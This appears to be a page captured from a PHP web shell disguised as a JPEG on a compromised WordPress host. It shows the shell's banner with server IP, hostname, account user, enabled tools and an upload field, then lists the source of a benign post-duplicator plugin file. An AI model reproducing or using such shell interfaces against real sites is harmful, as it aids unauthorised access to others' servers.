????JFIF??x?x????'
Server IP : 104.21.48.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/buyeaa.com/wp-content/plugins/post-duplicator/includes/ |
Upload File : |
<?php namespace Mtphr\PostDuplicator; /** * Return an array of post types */ function duplicator_post_types() { $post_types = array('same' => __('Same as original', 'post-duplicator')); $pts = get_post_types(array(), 'objects'); // Remove framework post types unset( $pts['attachment'] ); unset( $pts['revision'] ); unset( $pts['nav_menu_item'] ); unset( $pts['wooframework'] ); if( is_array($pts) && count($pts) > 0 ) { foreach( $pts as $i=>$pt ) { $post_types[$i] = sanitize_text_field( $pt->labels->singular_name ); } } return $post_types; } /** * Check if a user can duplicate */ function user_can_duplicate( $post ) { if ( ! current_user_can( 'duplicate_posts' ) ) { return false; } if ( get_current_user_id() != $post->post_author ) { if ( ! current_user_can( 'duplicate_others_posts' ) ) { return false; } if ( 'draft' == $post->post_status && 'disabled' === get_option_value( 'duplicate_other_draft' ) ) { return false; } if ( 'pending' == $post->post_status && 'disabled' === get_option_value( 'duplicate_other_pending' ) ) { return false; } if ( 'private' == $post->post_status && 'disabled' === get_option_value( 'duplicate_other_private' ) ) { return false; } if ( '' != $post->post_password && 'disabled' === get_option_value( 'duplicate_other_password' ) ) { return false; } if ( 'future' == $post->post_status && 'disabled' === get_option_value( 'duplicate_other_future' ) ) { return false; } } return true; }